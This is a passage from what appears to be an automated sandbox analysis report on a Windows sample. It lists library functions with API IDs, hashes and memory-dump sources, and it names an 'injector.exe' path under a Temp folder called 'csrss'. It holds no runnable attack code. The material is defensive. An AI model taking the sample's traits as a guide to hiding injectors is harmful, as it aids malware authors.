                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$GetctypeLocinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2967684691-1405518554
                                                                      • Opcode ID: 6a852068e18d71b0ce0acc72113bbfdafe7c2dbe35f4abdb51c183167ab0e0f7
                                                                      • Instruction ID: e172f9a306c0f2113ed0bf32ab6ecb2c7f91f83b410d51570136ffb01ea12636
                                                                      • Opcode Fuzzy Hash: 6a852068e18d71b0ce0acc72113bbfdafe7c2dbe35f4abdb51c183167ab0e0f7
                                                                      • Instruction Fuzzy Hash: BA415A22F0AF4299EB90DB64D4902BC33B4AF82B54F444039DA4EA3A56DF38E516E344
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61489BA34, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: AddressFreeHandleLibraryModuleProc
                                                                      • String ID: CorExitProcess$mscoree.dll
                                                                      • API String ID: 4061214504-1276376045
                                                                      • Opcode ID: dd41b59062e1bded5e4a64ebb4ded833bad7bfefc86d4ef402e3721322b693a7
                                                                      • Instruction ID: bcbe166bd5dadd9ff8fedbaa5c845895175c9860bd8f233fb58ced2d9dc3e0f6
                                                                      • Opcode Fuzzy Hash: dd41b59062e1bded5e4a64ebb4ded833bad7bfefc86d4ef402e3721322b693a7
                                                                      • Instruction Fuzzy Hash: 67F03061A19E0285EB854B91E4D83741360AF85F60F545036D60F875B4CE6CD488C300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148905DC, Relevance: 7.8, APIs: 5, Instructions: 290COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID:
                                                                      • API String ID: 1740715915-0
                                                                      • Opcode ID: 61344d6823eee478dc0851b8babc93acb3fc4ce47a6e2b4299efaae8650d3a38
                                                                      • Instruction ID: b7b8c79b5ca33ae5caffc9021c4f6325a800b4887364faf1f280962d9e572877
                                                                      • Opcode Fuzzy Hash: 61344d6823eee478dc0851b8babc93acb3fc4ce47a6e2b4299efaae8650d3a38
                                                                      • Instruction Fuzzy Hash: 5EB1AFA2A0AF4291EAE5DA51D5C02396390AFC7FB4F198436DB4DC7785DF3EE4828740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614881580, Relevance: 7.7, APIs: 5, Instructions: 183COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task__std_exception_copy__std_exception_destroy
                                                                      • String ID:
                                                                      • API String ID: 1087005451-0
                                                                      • Opcode ID: 230dbc250809a90322377d94343768eb68c9b033416a55001241a1c5e3e2d059
                                                                      • Instruction ID: 5df1f714440dce0efeb15b37e159544265752b41b69bad6a544c8e1762aedc85
                                                                      • Opcode Fuzzy Hash: 230dbc250809a90322377d94343768eb68c9b033416a55001241a1c5e3e2d059
                                                                      • Instruction Fuzzy Hash: EF71AE22B09F4289FB50DBA5D0903AC3362EB56BA8F404635DF5C57BDAEF78E0958340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A0120, Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: b2c59d728636b0c6554cac728b920e7f028990e3d1f05e9dc6a8eba7ec4e4899
                                                                      • Instruction ID: 2f8d9454a0476d8e010ddce3e5059a04c891393cae066740255dbdad4deb7baf
                                                                      • Opcode Fuzzy Hash: b2c59d728636b0c6554cac728b920e7f028990e3d1f05e9dc6a8eba7ec4e4899
                                                                      • Instruction Fuzzy Hash: 3351A6A6D08E4646E7A39E38A4D037A5250BF47B74F248235E95EAB5F4DF7CE483C600
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148ABBC4, Relevance: 7.6, APIs: 5, Instructions: 56COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _set_statfp
                                                                      • String ID:
                                                                      • API String ID: 1156100317-0
                                                                      • Opcode ID: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
                                                                      • Instruction ID: 1156fada0074be42092bfe15303091e0932d86a1ae689fe4c94c6bc3bc8f41aa
                                                                      • Opcode Fuzzy Hash: eaed8dfff0f68ad8df544ac5f149add81e04ab95f19dfb156c94115c05b10cc8
                                                                      • Instruction Fuzzy Hash: B0118F66E18E1345F6D82528E4E5B7910416F67B74E240E34EB7F876F78E9CED828101
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614891914, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 190COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: 3b8f6f38903736f98fcdca112aa5d53be49a37cbb0ed99218ee9529973844066
                                                                      • Instruction ID: a7b3dabb98c932cb0392d2e5aab87ddba29e3e438ef708d27439dc776467f8d2
                                                                      • Opcode Fuzzy Hash: 3b8f6f38903736f98fcdca112aa5d53be49a37cbb0ed99218ee9529973844066
                                                                      • Instruction Fuzzy Hash: 7091F373A08F818AE791CB65E4802AD77A0FB86B98F14412AEF8C97B55DF38D195C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614894388, Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 154COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: $*
                                                                      • API String ID: 3215553584-3982473090
                                                                      • Opcode ID: 9e97f74fb747d070684286d516df8dd40ef65855817175db68c8e5f249a723b2
                                                                      • Instruction ID: 74536f0a459eb70f89838680c4a93c4d0a795ff33cf98059c55e34c657751233
                                                                      • Opcode Fuzzy Hash: 9e97f74fb747d070684286d516df8dd40ef65855817175db68c8e5f249a723b2
                                                                      • Instruction Fuzzy Hash: 6E61607290DE5286E7E98F6CD0D407C3BA0FB87F68F641139DA4A87698CF2AE441C754
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614891E88, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 149COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 3896166516-3733052814
                                                                      • Opcode ID: cba4f8b5f87033059ccdbbbfc1978a4dfca7c68608478ea5e05f421b44258d1c
                                                                      • Instruction ID: 0ff43f72ea8e35350016c317ed4ada2509a161eeceb7e71bd4584d7b8890a0a3
                                                                      • Opcode Fuzzy Hash: cba4f8b5f87033059ccdbbbfc1978a4dfca7c68608478ea5e05f421b44258d1c
                                                                      • Instruction Fuzzy Hash: 01519F36908E868AEBB49F21D58427877A0FB82FA4F144135EA9D87BD6CF3DE450C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148916FC, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CallEncodePointerTranslator
                                                                      • String ID: MOC$RCC
                                                                      • API String ID: 3544855599-2084237596
                                                                      • Opcode ID: b3ad751d0cb4c71745f32e3f4ee4c7ad361712d25d56141f8ce21363a664fd63
                                                                      • Instruction ID: 31ef06e1bfe759f71d364eac43bf4abae3f76b9de298d5bf956d65713058f4a8
                                                                      • Opcode Fuzzy Hash: b3ad751d0cb4c71745f32e3f4ee4c7ad361712d25d56141f8ce21363a664fd63
                                                                      • Instruction Fuzzy Hash: CB514937A18F858AE7618F65D0803AD77A0FB86B98F144629EF4D97B58DF39E085C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614888FE0, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2775327233-1405518554
                                                                      • Opcode ID: 827cb531c25d537041628304b2b1cd442d8201b0c86c49ad65a9cdcbdbef1cee
                                                                      • Instruction ID: 6eee581ff8e9e0a85b76a98da58fd15e44ec0368377f73de75047bbba9cbe2c3
                                                                      • Opcode Fuzzy Hash: 827cb531c25d537041628304b2b1cd442d8201b0c86c49ad65a9cdcbdbef1cee
                                                                      • Instruction Fuzzy Hash: 4E415C22B0AE4299EB94EFB4D4D02EC33A4EF46B58F444038DA4DA7A55DE38D522E354
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614889160, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Locinfo::_Locinfo_ctorLockit::_Lockit::~_
                                                                      • String ID: bad locale name
                                                                      • API String ID: 2775327233-1405518554
                                                                      • Opcode ID: e9dcfafce1d1b79f0454f0c7063429ff212ad751e0c1960cfd28cdf1e2b7ecd8
                                                                      • Instruction ID: ca3eb08a665bc47499e611aca76b897a23fd5d44fc32b9ba0360ef7a4eb6836d
                                                                      • Opcode Fuzzy Hash: e9dcfafce1d1b79f0454f0c7063429ff212ad751e0c1960cfd28cdf1e2b7ecd8
                                                                      • Instruction Fuzzy Hash: D2415E22B0AE4299EB94DF74D4D02EC33A4EF46B68F444434DE4DA3A59CF38D522E354
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614882700, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 71COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __std_exception_copy.LIBVCRUNTIME ref: 00007FF6148827B8
                                                                        • Part of subcall function 00007FF61488F4EC: RtlPcToFileHeader.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF614889B0E), ref: 00007FF61488F530
                                                                        • Part of subcall function 00007FF61488F4EC: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,7FFFFFFFFFFFFFFF,00007FF614889B0E), ref: 00007FF61488F576
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ExceptionFileHeaderRaise__std_exception_copy
                                                                      • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                      • API String ID: 3973727643-1866435925
                                                                      • Opcode ID: 0646b899308f3453d400320ab1734e666a4998a245cbdc518b35f174e8f0a7bc
                                                                      • Instruction ID: 33b794f194a3e81b26556581438f09145b2f2044444e82f8796bad330921746e
                                                                      • Opcode Fuzzy Hash: 0646b899308f3453d400320ab1734e666a4998a245cbdc518b35f174e8f0a7bc
                                                                      • Instruction Fuzzy Hash: CF21DC22A08E4295EA84DF11E8C11A93361EF55BA4F988132DB4D836A6EF3CE196C340
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A1868, Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 238COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: ios_base::failbit set
                                                                      • API String ID: 3215553584-3924258884
                                                                      • Opcode ID: 2fb02fa14cb39cafdb2ac7ce505cebd37662ddc51a353eb412fb7d2a2d8dbfc1
                                                                      • Instruction ID: 9a49d1e84b419f327282a705ad13986ee8ec2fa89c0bd6ee4801cded4496ddaa
                                                                      • Opcode Fuzzy Hash: 2fb02fa14cb39cafdb2ac7ce505cebd37662ddc51a353eb412fb7d2a2d8dbfc1
                                                                      • Instruction Fuzzy Hash: BEA1C122B19E4685FBA08B6094C01BD62E1AF46FF4F684631DE5D97AE8EF7CD446C310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148920C8, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 169COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: __except_validate_context_record
                                                                      • String ID: csm$csm
                                                                      • API String ID: 1467352782-3733052814
                                                                      • Opcode ID: 1def0d11c4647c162defc29ee4d7443d642b152b28692578d685c6d7b4b99fdf
                                                                      • Instruction ID: 9d0bca9b742f80a7695247dccea7717abd37cf975b9a4271d31ebde7749c3fcf
                                                                      • Opcode Fuzzy Hash: 1def0d11c4647c162defc29ee4d7443d642b152b28692578d685c6d7b4b99fdf
                                                                      • Instruction Fuzzy Hash: CB710332508E8186DBA58F69D09067DBBA0FB82FA8F148535DF8C87A95CF3DE561C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61489F4BC, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 134COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: _invalid_parameter_noinfo
                                                                      • String ID: e+000$gfff
                                                                      • API String ID: 3215553584-3030954782
                                                                      • Opcode ID: f4f137b188e5893866b64892a04e11eec720c8251b34085c1488a3329f5ed9d4
                                                                      • Instruction ID: 994b19d62f24f8de1e648cd09cf48d9aafd1847a64076281111d546b1533d47c
                                                                      • Opcode Fuzzy Hash: f4f137b188e5893866b64892a04e11eec720c8251b34085c1488a3329f5ed9d4
                                                                      • Instruction Fuzzy Hash: A5511762B18FC146E7A98F35D8903696B91E782FA0F488231D79CC7AD5CE2ED444C700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148885D0, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 131COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                      • String ID: ios_base::failbit set
                                                                      • API String ID: 73155330-3924258884
                                                                      • Opcode ID: b173cbb97e25df18fb4874a723ea1798176f7d9395f438a44dd196d1cacc4d3b
                                                                      • Instruction ID: c5c3975e44382460adc38b1a4aae65d5e76c7b9a3ddc439118559ea3958cf9b4
                                                                      • Opcode Fuzzy Hash: b173cbb97e25df18fb4874a723ea1798176f7d9395f438a44dd196d1cacc4d3b
                                                                      • Instruction Fuzzy Hash: 5041B422718E8355EEA0EF16A5842A96361FB46FE4F544631DF6E87BC6DF3CE0419304
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF614892704, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: CreateFrameInfo__except_validate_context_record
                                                                      • String ID: csm
                                                                      • API String ID: 2558813199-1018135373
                                                                      • Opcode ID: 1e8bdd6c694ec2b645be78f9d24aec0e2489a08d3f49d285c7cb06928bb6b1a7
                                                                      • Instruction ID: f3c93f23de8b771ecbfc177e3e2eb72809f33c54857b05896197819ab5018f1f
                                                                      • Opcode Fuzzy Hash: 1e8bdd6c694ec2b645be78f9d24aec0e2489a08d3f49d285c7cb06928bb6b1a7
                                                                      • Instruction Fuzzy Hash: 63514073618F4186E6A1EB55E08436D77A0F78ABB5F140534DB8D87B56CF3DE0558B00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF61489B284, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 111COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • _invalid_parameter_noinfo.LIBCMT ref: 00007FF61489B2B6
                                                                        • Part of subcall function 00007FF61489E5E4: HeapFree.KERNEL32(?,?,00007FF61489D60F,00007FF6148A7DC0,?,?,?,00007FF6148A8143,?,?,0000E117BC86E4D3,00007FF6148A8688,?,?,?,00007FF6148A85BB), ref: 00007FF61489E5FA
                                                                        • Part of subcall function 00007FF61489E5E4: GetLastError.KERNEL32(?,?,00007FF61489D60F,00007FF6148A7DC0,?,?,?,00007FF6148A8143,?,?,0000E117BC86E4D3,00007FF6148A8688,?,?,?,00007FF6148A85BB), ref: 00007FF61489E60C
                                                                      • GetModuleFileNameW.KERNEL32(?,?,?,?,?,00007FF61488D849), ref: 00007FF61489B2D4
                                                                      Strings
                                                                      • C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe, xrefs: 00007FF61489B2C2
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorFileFreeHeapLastModuleName_invalid_parameter_noinfo
                                                                      • String ID: C:\Users\user\AppData\Local\Temp\csrss\injector\injector.exe
                                                                      • API String ID: 3580290477-4022000943
                                                                      • Opcode ID: d07806923a240e9b42c0af4a433109874be1beebc6025e65424fba5256e757d0
                                                                      • Instruction ID: 8c2e856a5737a622234b2f776453d7fa50fee11698f8b7caafbfd1cc55c0d8b7
                                                                      • Opcode Fuzzy Hash: d07806923a240e9b42c0af4a433109874be1beebc6025e65424fba5256e757d0
                                                                      • Instruction Fuzzy Hash: A9415E36A08E5285EB94DF25D4811BD2794FF86FE4B944036EA4E83B85DF3EE841C310
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A2F54, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
                                                                      • API ID: ErrorFileLastWrite
                                                                      • String ID: U
                                                                      • API String ID: 442123175-4171548499
                                                                      • Opcode ID: ef580d635dde8ef3720f0bf036fcd3533ab23aa0b8df9f85e9dd75b1584e7d17
                                                                      • Instruction ID: 802ab13b196758af223a3b8aa683636d27555ef968ed7eb96d19ae53cfebbfac
                                                                      • Opcode Fuzzy Hash: ef580d635dde8ef3720f0bf036fcd3533ab23aa0b8df9f85e9dd75b1584e7d17
                                                                      • Instruction Fuzzy Hash: 2B41B232A18F4182DBA09F25E4843AA77A0FB89BA4F504131EE4DC7798DFBCD441C740
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF6148A1714, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 85COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000023.00000002.926005520.00007FF614881000.00000020.00020000.sdmp, Offset: 00007FF614880000, based on PE: true
                                                                      • Associated: 00000023.00000002.925993366.00007FF614880000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926055638.00007FF6148AF000.00000002.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926079895.00007FF6148C3000.00000004.00020000.sdmp Download File
                                                                      • Associated: 00000023.00000002.926093057.00007FF6148C6000.00000002.00020000.sdmp Download File
                                                                      Similarity
